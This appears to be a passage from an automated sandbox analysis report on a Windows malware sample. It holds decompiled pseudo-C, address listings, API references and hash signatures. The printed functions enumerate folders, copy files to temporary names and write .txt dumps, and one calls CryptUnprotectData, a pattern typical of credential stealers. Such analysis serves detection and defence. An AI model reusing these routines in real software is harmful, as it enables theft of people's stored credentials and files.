					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t162, 0x104) != 0) {
						_push(_t210);
						_push(0x411480);
						_push( *[fs:eax]);
						 *[fs:eax] = _t211;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x41156c);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(0x41156c);
							E0040813C(0x61,  &_v652);
							_push(_v652);
							E00403E1C();
							E00410BB8(_v644, _t162,  &_v640, _t207, _t208);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x41156c);
							_push(_v12);
							_push(E00411574);
							E00403D10( &_v664, 0x104,  &(_v616.cFileName));
							_push(_v664);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v656, _v660);
							_pop(_t160);
							E0040DCE8(_t160, _t162, _v656, _t207, _t208);
						}
						if(_a4 == 0) {
							_push(_v8);
							_push(0x41156c);
							E00403D10( &_v680, 0x104,  &(_v616.cFileName));
							_push(_v680);
							_push(0x41156c);
							E0040813C(0x61,  &_v684);
							_push(_v684);
							E00403E1C();
							E00410E70(_v676, _t162,  &_v672, _t207, _t208);
							E0040377C( &_v668, _v672);
							_push(_v668);
							_push(_v16);
							_push(0x41156c);
							_push(_v12);
							_push(E00411574);
							E00403D10( &_v696, 0x104,  &(_v616.cFileName));
							_push(_v696);
							_push(E00411574);
							_push(E0041158C);
							_push(E0041158C);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v688, _v692);
							_pop(_t143);
							E0040DCE8(_t143, _t162, _v688, _t207, _t208);
						}
						_pop(_t188);
						 *[fs:eax] = _t188;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t181);
				 *[fs:eax] = _t181;
				_push(E0041154C);
				E00403B98( &_v696, 2);
				E004034E4( &_v688);
				E00403B98( &_v684, 4);
				E004034E4( &_v668);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}



































                                                                                                                                                                                          0x004111c4
                                                                                                                                                                                          0x004111c4
                                                                                                                                                                                          0x004111c4
                                                                                                                                                                                          0x004111c5
                                                                                                                                                                                          0x004111c7
                                                                                                                                                                                          0x004111c8
                                                                                                                                                                                          0x004111cd
                                                                                                                                                                                          0x004111cd
                                                                                                                                                                                          0x004111cf
                                                                                                                                                                                          0x004111d1
                                                                                                                                                                                          0x004111d1
                                                                                                                                                                                          0x004111d4
                                                                                                                                                                                          0x004111d4
                                                                                                                                                                                          0x004111d7
                                                                                                                                                                                          0x004111d8
                                                                                                                                                                                          0x004111d9
                                                                                                                                                                                          0x004111da
                                                                                                                                                                                          0x004111dd
                                                                                                                                                                                          0x004111e0
                                                                                                                                                                                          0x004111e6
                                                                                                                                                                                          0x004111ee
                                                                                                                                                                                          0x004111f6
                                                                                                                                                                                          0x004111fd
                                                                                                                                                                                          0x004111fe
                                                                                                                                                                                          0x00411203
                                                                                                                                                                                          0x00411206
                                                                                                                                                                                          0x0041121e
                                                                                                                                                                                          0x00411234
                                                                                                                                                                                          0x00411237
                                                                                                                                                                                          0x00411237
                                                                                                                                                                                          0x0041123a
                                                                                                                                                                                          0x00411250
                                                                                                                                                                                          0x00411255
                                                                                                                                                                                          0x0041125b
                                                                                                                                                                                          0x0041126b
                                                                                                                                                                                          0x00411270
                                                                                                                                                                                          0x00411281
                                                                                                                                                                                          0x00411293
                                                                                                                                                                                          0x0041129b
                                                                                                                                                                                          0x0041129c
                                                                                                                                                                                          0x004112a1
                                                                                                                                                                                          0x004112a4
                                                                                                                                                                                          0x004112ab
                                                                                                                                                                                          0x004112b1
                                                                                                                                                                                          0x004112b4
                                                                                                                                                                                          0x004112ca
                                                                                                                                                                                          0x004112cf
                                                                                                                                                                                          0x004112d5
                                                                                                                                                                                          0x004112e5
                                                                                                                                                                                          0x004112ea
                                                                                                                                                                                          0x004112fb
                                                                                                                                                                                          0x0041130c
                                                                                                                                                                                          0x0041131d
                                                                                                                                                                                          0x00411328
                                                                                                                                                                                          0x00411329
                                                                                                                                                                                          0x0041132c
                                                                                                                                                                                          0x00411331
                                                                                                                                                                                          0x00411334
                                                                                                                                                                                          0x0041134a
                                                                                                                                                                                          0x0041134f
                                                                                                                                                                                          0x00411355
                                                                                                                                                                                          0x00411365
                                                                                                                                                                                          0x00411376
                                                                                                                                                                                          0x00411381
                                                                                                                                                                                          0x00411382
                                                                                                                                                                                          0x00411382
                                                                                                                                                                                          0x0041138b
                                                                                                                                                                                          0x00411391
                                                                                                                                                                                          0x00411394
                                                                                                                                                                                          0x004113aa
                                                                                                                                                                                          0x004113af
                                                                                                                                                                                          0x004113b5
                                                                                                                                                                                          0x004113c5
                                                                                                                                                                                          0x004113ca
                                                                                                                                                                                          0x004113db
                                                                                                                                                                                          0x004113ec
                                                                                                                                                                                          0x004113fd
                                                                                                                                                                                          0x00411408
                                                                                                                                                                                          0x00411409
                                                                                                                                                                                          0x0041140c
                                                                                                                                                                                          0x00411411
                                                                                                                                                                                          0x00411414
                                                                                                                                                                                          0x0041142a
                                                                                                                                                                                          0x0041142f
                                                                                                                                                                                          0x00411435
                                                                                                                                                                                          0x0041143a
                                                                                                                                                                                          0x0041143f
                                                                                                                                                                                          0x00411444
                                                                                                                                                                                          0x00411454
                                                                                                                                                                                          0x00411465
                                                                                                                                                                                          0x00411470
                                                                                                                                                                                          0x00411471
                                                                                                                                                                                          0x00411471
                                                                                                                                                                                          0x00411478
                                                                                                                                                                                          0x0041147b
                                                                                                                                                                                          0x0041147b
                                                                                                                                                                                          0x0041149a
                                                                                                                                                                                          0x004114a6
                                                                                                                                                                                          0x004114ad
                                                                                                                                                                                          0x004114b0
                                                                                                                                                                                          0x004114b3
                                                                                                                                                                                          0x004114c3
                                                                                                                                                                                          0x004114ce
                                                                                                                                                                                          0x004114de
                                                                                                                                                                                          0x004114e9
                                                                                                                                                                                          0x004114f9
                                                                                                                                                                                          0x00411504
                                                                                                                                                                                          0x00411514
                                                                                                                                                                                          0x0041151f
                                                                                                                                                                                          0x0041152f
                                                                                                                                                                                          0x00411541

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F
                                                                                                                                                                                            • Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                            • Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                                                                                                                                                                                          • String ID: .txt$\*.*
                                                                                                                                                                                          • API String ID: 4269597168-2615687548
                                                                                                                                                                                          • Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                                                                                                          • Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041158C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E0041158C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				void* _t109;
				void* _t113;
				intOrPtr _t115;
				intOrPtr _t130;
				intOrPtr _t144;
				intOrPtr _t148;
				intOrPtr _t149;

				_t146 = __esi;
				_t145 = __edi;
				_t113 = __ebx + 1;
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t148 = _t149;
				_push(__ecx);
				_t115 = 0x52;
				do {
					_push(0);
					_push(0);
					_t115 = _t115 - 1;
				} while (_t115 != 0);
				_t3 =  &_v8;
				 *_t3 = _t115;
				_push(_t113);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t3;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t148);
				_push(0x4117df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411808);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411808);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t113, 0x104) != 0) {
						_push(_t148);
						_push(0x411753);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						_push(_v8);
						_push(0x411808);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(0x411808);
						E0040813C(0x1f,  &_v652);
						_push(_v652);
						E00403E1C();
						E00410900(_v644, _t113,  &_v640, _t145, _t146);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x411808);
						_push(_v12);
						_push(E00411810);
						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
						_push(_v664);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v656, _v660);
						_pop(_t109);
						E0040DCE8(_t109, _t113, _v656, _t145, _t146);
						_pop(_t144);
						 *[fs:eax] = _t144;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t130);
				 *[fs:eax] = _t130;
				_push(E004117E6);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}




























                                                                                                                                                                                          0x0041158c
                                                                                                                                                                                          0x0041158c
                                                                                                                                                                                          0x0041158c
                                                                                                                                                                                          0x0041158d
                                                                                                                                                                                          0x0041158f
                                                                                                                                                                                          0x00411591
                                                                                                                                                                                          0x00411593
                                                                                                                                                                                          0x00411594
                                                                                                                                                                                          0x00411599
                                                                                                                                                                                          0x00411599
                                                                                                                                                                                          0x0041159b
                                                                                                                                                                                          0x0041159d
                                                                                                                                                                                          0x0041159d
                                                                                                                                                                                          0x004115a0
                                                                                                                                                                                          0x004115a0
                                                                                                                                                                                          0x004115a3
                                                                                                                                                                                          0x004115a4
                                                                                                                                                                                          0x004115a5
                                                                                                                                                                                          0x004115a6
                                                                                                                                                                                          0x004115a9
                                                                                                                                                                                          0x004115ac
                                                                                                                                                                                          0x004115b2
                                                                                                                                                                                          0x004115ba
                                                                                                                                                                                          0x004115c2
                                                                                                                                                                                          0x004115c9
                                                                                                                                                                                          0x004115ca
                                                                                                                                                                                          0x004115cf
                                                                                                                                                                                          0x004115d2
                                                                                                                                                                                          0x004115ea
                                                                                                                                                                                          0x00411600
                                                                                                                                                                                          0x00411603
                                                                                                                                                                                          0x00411603
                                                                                                                                                                                          0x00411606
                                                                                                                                                                                          0x0041161c
                                                                                                                                                                                          0x00411621
                                                                                                                                                                                          0x00411627
                                                                                                                                                                                          0x00411637
                                                                                                                                                                                          0x0041163c
                                                                                                                                                                                          0x0041164d
                                                                                                                                                                                          0x0041165f
                                                                                                                                                                                          0x00411667
                                                                                                                                                                                          0x00411668
                                                                                                                                                                                          0x0041166d
                                                                                                                                                                                          0x00411670
                                                                                                                                                                                          0x00411673
                                                                                                                                                                                          0x00411676
                                                                                                                                                                                          0x0041168c
                                                                                                                                                                                          0x00411691
                                                                                                                                                                                          0x00411697
                                                                                                                                                                                          0x004116a7
                                                                                                                                                                                          0x004116ac
                                                                                                                                                                                          0x004116bd
                                                                                                                                                                                          0x004116ce
                                                                                                                                                                                          0x004116df
                                                                                                                                                                                          0x004116ea
                                                                                                                                                                                          0x004116eb
                                                                                                                                                                                          0x004116ee
                                                                                                                                                                                          0x004116f3
                                                                                                                                                                                          0x004116f6
                                                                                                                                                                                          0x0041170c
                                                                                                                                                                                          0x00411711
                                                                                                                                                                                          0x00411717
                                                                                                                                                                                          0x00411727
                                                                                                                                                                                          0x00411738
                                                                                                                                                                                          0x00411743
                                                                                                                                                                                          0x00411744
                                                                                                                                                                                          0x0041174b
                                                                                                                                                                                          0x0041174e
                                                                                                                                                                                          0x0041174e
                                                                                                                                                                                          0x0041176d
                                                                                                                                                                                          0x00411779
                                                                                                                                                                                          0x00411780
                                                                                                                                                                                          0x00411783
                                                                                                                                                                                          0x00411786
                                                                                                                                                                                          0x00411796
                                                                                                                                                                                          0x004117a1
                                                                                                                                                                                          0x004117b1
                                                                                                                                                                                          0x004117bc
                                                                                                                                                                                          0x004117cc
                                                                                                                                                                                          0x004117de

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstFreeNextString
                                                                                                                                                                                          • String ID: .txt$\*.*
                                                                                                                                                                                          • API String ID: 2008072091-2615687548
                                                                                                                                                                                          • Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                                                                                                          • Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00411590, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E00411590(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				void* _t107;
				intOrPtr _t112;
				intOrPtr _t127;
				intOrPtr _t141;
				intOrPtr _t145;
				intOrPtr _t146;

				_t143 = __esi;
				_t142 = __edi;
				_t110 = __ebx;
				_t145 = _t146;
				_push(__ecx);
				_t112 = 0x52;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_t1 =  &_v8;
				 *_t1 = _t112;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t145);
				_push(0x4117df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t146;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411808);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411808);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t110, 0x104) != 0) {
						_push(_t145);
						_push(0x411753);
						_push( *[fs:eax]);
						 *[fs:eax] = _t146;
						_push(_v8);
						_push(0x411808);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(0x411808);
						E0040813C(0x1f,  &_v652);
						_push(_v652);
						E00403E1C();
						E00410900(_v644, _t110,  &_v640, _t142, _t143);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x411808);
						_push(_v12);
						_push(E00411810);
						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
						_push(_v664);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v656, _v660);
						_pop(_t107);
						E0040DCE8(_t107, _t110, _v656, _t142, _t143);
						_pop(_t141);
						 *[fs:eax] = _t141;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(E004117E6);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}


























                                                                                                                                                                                          0x00411590
                                                                                                                                                                                          0x00411590
                                                                                                                                                                                          0x00411590
                                                                                                                                                                                          0x00411591
                                                                                                                                                                                          0x00411593
                                                                                                                                                                                          0x00411594
                                                                                                                                                                                          0x00411599
                                                                                                                                                                                          0x00411599
                                                                                                                                                                                          0x0041159b
                                                                                                                                                                                          0x0041159d
                                                                                                                                                                                          0x0041159d
                                                                                                                                                                                          0x004115a0
                                                                                                                                                                                          0x004115a0
                                                                                                                                                                                          0x004115a3
                                                                                                                                                                                          0x004115a4
                                                                                                                                                                                          0x004115a5
                                                                                                                                                                                          0x004115a6
                                                                                                                                                                                          0x004115a9
                                                                                                                                                                                          0x004115ac
                                                                                                                                                                                          0x004115b2
                                                                                                                                                                                          0x004115ba
                                                                                                                                                                                          0x004115c2
                                                                                                                                                                                          0x004115c9
                                                                                                                                                                                          0x004115ca
                                                                                                                                                                                          0x004115cf
                                                                                                                                                                                          0x004115d2
                                                                                                                                                                                          0x004115ea
                                                                                                                                                                                          0x00411600
                                                                                                                                                                                          0x00411603
                                                                                                                                                                                          0x00411603
                                                                                                                                                                                          0x00411606
                                                                                                                                                                                          0x0041161c
                                                                                                                                                                                          0x00411621
                                                                                                                                                                                          0x00411627
                                                                                                                                                                                          0x00411637
                                                                                                                                                                                          0x0041163c
                                                                                                                                                                                          0x0041164d
                                                                                                                                                                                          0x0041165f
                                                                                                                                                                                          0x00411667
                                                                                                                                                                                          0x00411668
                                                                                                                                                                                          0x0041166d
                                                                                                                                                                                          0x00411670
                                                                                                                                                                                          0x00411673
                                                                                                                                                                                          0x00411676
                                                                                                                                                                                          0x0041168c
                                                                                                                                                                                          0x00411691
                                                                                                                                                                                          0x00411697
                                                                                                                                                                                          0x004116a7
                                                                                                                                                                                          0x004116ac
                                                                                                                                                                                          0x004116bd
                                                                                                                                                                                          0x004116ce
                                                                                                                                                                                          0x004116df
                                                                                                                                                                                          0x004116ea
                                                                                                                                                                                          0x004116eb
                                                                                                                                                                                          0x004116ee
                                                                                                                                                                                          0x004116f3
                                                                                                                                                                                          0x004116f6
                                                                                                                                                                                          0x0041170c
                                                                                                                                                                                          0x00411711
                                                                                                                                                                                          0x00411717
                                                                                                                                                                                          0x00411727
                                                                                                                                                                                          0x00411738
                                                                                                                                                                                          0x00411743
                                                                                                                                                                                          0x00411744
                                                                                                                                                                                          0x0041174b
                                                                                                                                                                                          0x0041174e
                                                                                                                                                                                          0x0041174e
                                                                                                                                                                                          0x0041176d
                                                                                                                                                                                          0x00411779
                                                                                                                                                                                          0x00411780
                                                                                                                                                                                          0x00411783
                                                                                                                                                                                          0x00411786
                                                                                                                                                                                          0x00411796
                                                                                                                                                                                          0x004117a1
                                                                                                                                                                                          0x004117b1
                                                                                                                                                                                          0x004117bc
                                                                                                                                                                                          0x004117cc
                                                                                                                                                                                          0x004117de

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstFreeNextString
                                                                                                                                                                                          • String ID: .txt$\*.*
                                                                                                                                                                                          • API String ID: 2008072091-2615687548
                                                                                                                                                                                          • Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                                                                                                          • Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
                                                                                                                                                                                          • Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004094C4, Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                          			E004094C4(intOrPtr __eax, void* __ecx, char __edx) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v36;
				intOrPtr _v40;

				_t19 = __ecx;
				_v20 = __edx;
				_v16 = __eax;
				_push( &_v12);
				_push(1);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v20);
				if( *0x41c7c8() == 0) {
					return E00403538(__ecx, E0040952C);
				}
				E004036DC(__ecx, _v36);
				E00403AC0(_t19, _v40);
				return LocalFree(_v36);
			}








                                                                                                                                                                                          0x004094c8
                                                                                                                                                                                          0x004094ca
                                                                                                                                                                                          0x004094cd
                                                                                                                                                                                          0x004094d5
                                                                                                                                                                                          0x004094d6
                                                                                                                                                                                          0x004094d8
                                                                                                                                                                                          0x004094da
                                                                                                                                                                                          0x004094dc
                                                                                                                                                                                          0x004094de
                                                                                                                                                                                          0x004094e4
                                                                                                                                                                                          0x004094ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00409518
                                                                                                                                                                                          0x004094f5
                                                                                                                                                                                          0x00409500
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040950A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CryptDataFreeLocalUnprotect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1561624719-0
                                                                                                                                                                                          • Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                                                                                                                                          • Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404B4C, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E00404B4C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x404bb2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00403748( &_v20, 7,  &_v15);
				E00402988(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00404BB9);
				return E004034E4( &_v20);
			}








                                                                                                                                                                                          0x00404b55
                                                                                                                                                                                          0x00404b5a
                                                                                                                                                                                          0x00404b5b
                                                                                                                                                                                          0x00404b60
                                                                                                                                                                                          0x00404b63
                                                                                                                                                                                          0x00404b72
                                                                                                                                                                                          0x00404b82
                                                                                                                                                                                          0x00404b8d
                                                                                                                                                                                          0x00404b98
                                                                                                                                                                                          0x00404b98
                                                                                                                                                                                          0x00404b9e
                                                                                                                                                                                          0x00404ba1
                                                                                                                                                                                          0x00404ba4
                                                                                                                                                                                          0x00404bb1

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                                                                                                                                          • Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
                                                                                                                                                                                          • Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407A34, Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407A34() {

				return  *[fs:0x30];
			}



                                                                                                                                                                                          0x00407a3b

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                                                                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

